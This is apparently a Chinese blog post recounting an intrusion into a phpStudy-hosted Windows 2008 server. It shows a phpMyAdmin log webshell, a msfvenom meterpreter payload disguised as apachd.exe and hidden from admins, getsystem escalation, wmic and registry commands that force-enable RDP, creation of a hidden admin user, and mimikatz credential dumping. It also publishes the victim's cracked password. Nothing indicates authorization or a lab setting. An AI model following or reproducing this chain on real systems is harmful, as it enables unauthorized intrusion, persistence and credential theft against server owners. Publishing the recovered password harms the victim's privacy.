渗透前期

这边是通过进入phpMyAdmin利用日志写一句话得到了一个WebSHELL

至于如何写一句话可以看我之前写的文章:phpMyAdmin利用日志文件GetSHELL

图片

图片

他是用phpStudy搭建的网站,默认会有phpMyAdmin,而且密码是默认账号密码,然后你懂的!在这里说一下使用phpStudy搭建网站后一点要更改phpMyAdmin的密码,不然就凉凉.

信息收集

  • 查看当前用户权限

whoami

图片

渗透也是需要运气的,这边是一个administrator权限

  • 查看有那些用户

net user

图片

这边看到这服务器没被搞过,还没得其他用户,只有一个administrator,紧接着我直接上MSF.

Metasploit对Windows2008提权

  • 生成正向Paylaod
1
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9090 -f exe >apachd.exe

图片

这边是上传到了C盘下的WinRAR目录,之所以没上传网站根目录后是怕管理员看到就凉凉咯.

图片

因为我们生成的Payload是正向,就得需要2008(被攻击者)来连接我们的MSF:

  • 查看ip地址

ipconfig

图片

1
2
use exploit/multi/handler 
set payload windows/x64/meterpreter/bind_tcp

图片

图片

反弹得到了一个会话

图片

getsystem直接得到SYSTEM系统权限!

接着是查看他的端口

图片

没有开3389,然后开Windows 2008的3389的dos命令是:

1
2
3
4
5
6
命令行强制开启3389服务支持server2008和2003
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where(__CLASS !="") call setallowtsconnections 1

wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where(TerminalName='RDP-Tcp') call setuserauthenticationrequired 1

3.reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

这边是用MSFrun getgui -e开启3389

1
2
3
4
5
6
7
8
9
10
11
12
meterpreter > run getgui -e

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20191029.2445.rc

图片

但是查看开放的端口并没有3389,这就脑壳痛了,他应该是改了端口!

图片

然后找到了他的远程登录端口:15351

这个时候利用MSF自带的mimikatz来读取管理员hash:

load mimikatz

图片

wdigest

图片

获取到了管理员密码,那个admin是我创建的隐藏用户

图片

然后用f063a302密码登录不上去我日,估计有缓存md,然后我去解密hash:

图片

fuckyou5201314???WTF?这密码真牛皮!

图片

提权就到此为止!